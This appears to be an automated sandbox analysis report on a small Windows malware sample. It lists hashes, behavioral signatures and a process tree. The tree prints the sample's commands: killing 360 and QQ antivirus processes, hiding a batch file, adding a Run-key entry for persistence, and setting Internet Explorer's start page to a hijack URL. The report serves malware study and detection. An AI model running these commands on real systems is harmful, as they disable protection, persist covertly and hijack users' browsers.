Analysis
-
max time kernel
141s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21/08/2024, 13:58
Static task
static1
Behavioral task
behavioral1
Sample
b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe
-
Size
70KB
-
MD5
b3bc6575c52bc13b94f4f7ee3cd6c0c7
-
SHA1
f1b849ca6b195f1cdfd8e88ea812f101d872138a
-
SHA256
c1a04b2637b1361d15fcd43cb7a1fb6e79e401ccaf8f08e5bc90661af4142c5e
-
SHA512
e6adc23db0c227276f3bba8e1a6cea5a8ef1c002ba95b5a6bf5f2d003a2c2cf12ec9c80b22a93066b30b06f48f86b1262b861510b7407a024094fe93cb31be1d
-
SSDEEP
1536:PBoWdHaDLw7iJvu+gFEJah1B+ILaxQjqOK:yWdHaDfJvUiahO7xQjqOK
Malware Config
Signatures
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2736 attrib.exe 2460 attrib.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\lin = "C:\\Windows\\system32\\WINUP.bat" reg.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\WINUP.bat attrib.exe File created C:\Windows\SysWOW64\WINUP.bat cmd.exe File opened for modification C:\Windows\SysWOW64\WINUP.bat cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4720 PING.EXE 3144 PING.EXE -
Kills process with taskkill 3 IoCs
pid Process 4860 taskkill.exe 1860 taskkill.exe 4684 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL = "http://union.dianxin.cn/d.php?type=5&said=1008" reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main reg.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Software\Microsoft\Internet Explorer\Main reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL = "http://union.dianxin.cn/d.php?type=5&said=1008" reg.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://union.dianxin.cn/d.php?type=5&said=1008" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://union.dianxin.cn/d.php?type=5&said=1008" reg.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4720 PING.EXE 3144 PING.EXE -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4684 taskkill.exe Token: SeDebugPrivilege 4860 taskkill.exe Token: SeDebugPrivilege 1860 taskkill.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2124 wrote to memory of 2496 2124 b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe 84 PID 2124 wrote to memory of 2496 2124 b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe 84 PID 2124 wrote to memory of 2496 2124 b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe 84 PID 2496 wrote to memory of 4684 2496 cmd.exe 86 PID 2496 wrote to memory of 4684 2496 cmd.exe 86 PID 2496 wrote to memory of 4684 2496 cmd.exe 86 PID 2496 wrote to memory of 4860 2496 cmd.exe 88 PID 2496 wrote to memory of 4860 2496 cmd.exe 88 PID 2496 wrote to memory of 4860 2496 cmd.exe 88 PID 2496 wrote to memory of 1860 2496 cmd.exe 89 PID 2496 wrote to memory of 1860 2496 cmd.exe 89 PID 2496 wrote to memory of 1860 2496 cmd.exe 89 PID 2496 wrote to memory of 2736 2496 cmd.exe 93 PID 2496 wrote to memory of 2736 2496 cmd.exe 93 PID 2496 wrote to memory of 2736 2496 cmd.exe 93 PID 2496 wrote to memory of 2460 2496 cmd.exe 94 PID 2496 wrote to memory of 2460 2496 cmd.exe 94 PID 2496 wrote to memory of 2460 2496 cmd.exe 94 PID 2496 wrote to memory of 1032 2496 cmd.exe 95 PID 2496 wrote to memory of 1032 2496 cmd.exe 95 PID 2496 wrote to memory of 1032 2496 cmd.exe 95 PID 2496 wrote to memory of 4720 2496 cmd.exe 96 PID 2496 wrote to memory of 4720 2496 cmd.exe 96 PID 2496 wrote to memory of 4720 2496 cmd.exe 96 PID 2496 wrote to memory of 916 2496 cmd.exe 103 PID 2496 wrote to memory of 916 2496 cmd.exe 103 PID 2496 wrote to memory of 916 2496 cmd.exe 103 PID 2496 wrote to memory of 1780 2496 cmd.exe 104 PID 2496 wrote to memory of 1780 2496 cmd.exe 104 PID 2496 wrote to memory of 1780 2496 cmd.exe 104 PID 2496 wrote to memory of 3144 2496 cmd.exe 105 PID 2496 wrote to memory of 3144 2496 cmd.exe 105 PID 2496 wrote to memory of 3144 2496 cmd.exe 105 PID 2496 wrote to memory of 2296 2496 cmd.exe 121 PID 2496 wrote to memory of 2296 2496 cmd.exe 121 PID 2496 wrote to memory of 2296 2496 cmd.exe 121 PID 2496 wrote to memory of 4364 2496 cmd.exe 122 PID 2496 wrote to memory of 4364 2496 cmd.exe 122 PID 2496 wrote to memory of 4364 2496 cmd.exe 122 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2736 attrib.exe 2460 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\Local\Temp\bt70246.bat "C:\Users\Admin\AppData\Local\Temp\b3bc6575c52bc13b94f4f7ee3cd6c0c7_JaffaCakes118.exe"2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im 360Tray.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QQPCTray.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QQPCMgr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\system32\WINUP.bat +s +h +a +r3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2736
-
-
C:\Windows\SysWOW64\attrib.exeattrib C:\Windows\system32\WINUP.bat +s +h +a +r3⤵
- Sets file to hidden
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2460
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v lin /t REG_SZ /d C:\Windows\system32\WINUP.bat /f3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1032
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 203⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4720
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://union.dianxin.cn/d.php?type=5&said=1008 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
PID:916
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://union.dianxin.cn/d.php?type=5&said=1008 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1780
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 1203⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3144
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://union.dianxin.cn/d.php?type=5&said=1008 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
PID:2296
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://union.dianxin.cn/d.php?type=5&said=1008 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:4364
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD57a99a8b1689c294c1bda19620adaffd3
SHA1c8e9654e057005c8f4a7f20b7238649b18f98721
SHA256e7ad5adb99800039fd97830ca796ce69eb651715e01a62b6e1d8fff5a50f5118
SHA5121243016dbfa42a4a0c30241418144641e5a4e0c3fdb973c84a5effa9987f950312ac9b8fea99e4dcc83186eab670026e2d794f747513a793157cfb7d273e0f55
-
Filesize
70KB
MD5b3bc6575c52bc13b94f4f7ee3cd6c0c7
SHA1f1b849ca6b195f1cdfd8e88ea812f101d872138a
SHA256c1a04b2637b1361d15fcd43cb7a1fb6e79e401ccaf8f08e5bc90661af4142c5e
SHA512e6adc23db0c227276f3bba8e1a6cea5a8ef1c002ba95b5a6bf5f2d003a2c2cf12ec9c80b22a93066b30b06f48f86b1262b861510b7407a024094fe93cb31be1d
-
Filesize
517B
MD590807193d396876a6a211ba312f47360
SHA1316b9b8ad2775820740a08c42c39a12bc6ec83c3
SHA256a33a28caf0db1427db2a5b25ee5421a28105493616bc0b81abd00327b33196dd
SHA51254b7142b06bc0d844735bf49fa7716e8c00562b89fe3b551a4d09f740509fdcd05f7742c509752bdabec1261b60e5e324066a431fc25816e9749fc7b30e8602e
-
Filesize
2KB
MD5e001ee76ff96ad637bb5fe9b11d37c8a
SHA1487c96649b5d4079767615c19bd9f4cffffd92fe
SHA2562da48efd5bd484a5905d45ffb9cd1e94d3656704ad755ec62856a2693e25d209
SHA512afd8b24b1f8c6be213a1a147fd36cc315983f400490a2d604c806c359ac6b8826cbad4a1505fc780f056fa7a77f5af6c4ea5affe1d9cd6ae5644ae08d7d0ceb7